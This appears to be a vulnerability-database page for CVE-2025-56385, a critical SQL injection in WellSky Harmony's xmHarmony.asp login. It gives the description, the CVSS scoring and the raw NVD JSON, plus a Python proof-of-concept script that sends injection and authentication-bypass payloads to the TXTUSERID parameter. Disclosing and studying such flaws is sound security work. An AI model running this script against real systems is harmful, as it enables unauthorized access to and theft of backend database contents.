Security Vulnerability Report
中文
CVE-2025-56385 CVSS 9.8 CRITICAL

CVE-2025-56385

Published: 2025-11-12 19:15:36
Last Modified: 2025-12-31 16:23:30
Source: [email protected]

Description

A SQL injection vulnerability exists in the login functionality of WellSky Harmony version 4.1.0.2.83 within the 'xmHarmony.asp' endpoint. User-supplied input to the 'TXTUSERID' parameter is not properly sanitized before being incorporated into a SQL query. Successful authentication may lead to authentication bypass, data leakage, or full system compromise of backend database contents.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wellsky:harmony:4.1.0.2.83:*:*:*:*:*:*:* - VULNERABLE
WellSky Harmony < 4.1.0.2.83
WellSky Harmony = 4.1.0.2.83

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-56385 SQL Injection PoC for WellSky Harmony xmHarmony.asp # Target: WellSky Harmony v4.1.0.2.83 # Attack Type: Authentication Bypass via SQL Injection import requests import sys from urllib.parse import urlencode def test_sql_injection(target_url): """ Test for SQL injection vulnerability in TXTUSERID parameter """ # Vulnerable endpoint endpoint = f"{target_url}/xmHarmony.asp" # Test payloads for SQL injection detection payloads = [ "'", "' OR '1'='1", "' OR '1'='1' --", "admin'--", "' UNION SELECT NULL--", "' AND SLEEP(5)--", ] print(f"[*] Testing SQL Injection on {endpoint}") print(f"[*] Target: {target_url}") for i, payload in enumerate(payloads, 1): print(f"\n[+] Testing payload {i}: {payload}") # Prepare POST data data = { 'TXTUSERID': payload, 'TXTPASSWORD': 'test', 'btnSubmit': 'Login' } headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } try: response = requests.post(endpoint, data=data, headers=headers, timeout=10) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response Length: {len(response.text)}") # Check for SQL error indicators error_indicators = ['sql', 'syntax', 'error', 'mysql', 'odbc', 'database', 'warning'] response_lower = response.text.lower() for indicator in error_indicators: if indicator in response_lower: print(f"[!] Potential SQL error detected: '{indicator}' found in response") except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") print("\n[*] Testing complete. Manual verification recommended.") def exploit_auth_bypass(target_url): """ Attempt authentication bypass using common SQL injection techniques """ endpoint = f"{target_url}/xmHarmony.asp" # Authentication bypass payloads bypass_payloads = [ "' OR '1'='1'", "' OR 'a'='a", "' OR ''='", "admin' OR '1'='1", "' OR 1=1--", ] print("\n[*] Attempting authentication bypass...") for payload in bypass_payloads: print(f"[*] Trying: {payload}") data = { 'TXTUSERID': payload, 'TXTPASSWORD': 'anything', 'btnSubmit': 'Login' } try: response = requests.post(endpoint, data=data, timeout=10, allow_redirects=False) # Check for successful login indicators if response.status_code in [200, 302]: if 'location' in [h.lower() for h in response.headers.keys()]: print(f"[!] Possible successful bypass - Redirect detected") if any(x in response.text.lower() for x in ['dashboard', 'welcome', 'logout', 'menu']): print(f"[!] SUCCESS: Authentication bypassed!") return True except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-56385.py <target_url>") print("Example: python cve-2025-56385.py http://vulnerable-server.com") sys.exit(1) target = sys.argv[1].rstrip('/') test_sql_injection(target) exploit_auth_bypass(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56385", "sourceIdentifier": "[email protected]", "published": "2025-11-12T19:15:36.323", "lastModified": "2025-12-31T16:23:29.657", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A SQL injection vulnerability exists in the login functionality of WellSky Harmony version 4.1.0.2.83 within the 'xmHarmony.asp' endpoint. User-supplied input to the 'TXTUSERID' parameter is not properly sanitized before being incorporated into a SQL query. Successful authentication may lead to authentication bypass, data leakage, or full system compromise of backend database contents."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wellsky:harmony:4.1.0.2.83:*:*:*:*:*:*:*", "matchCriteriaId": "9C37B93C-FDC9-4519-A575-ADF98EC9300E"}]}]}], "references": [{"url": "http://harmony.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "http://wellsky.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://machevalia.blog/blog/cve-2025-56385-wellsky-harmony-sql-injection", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.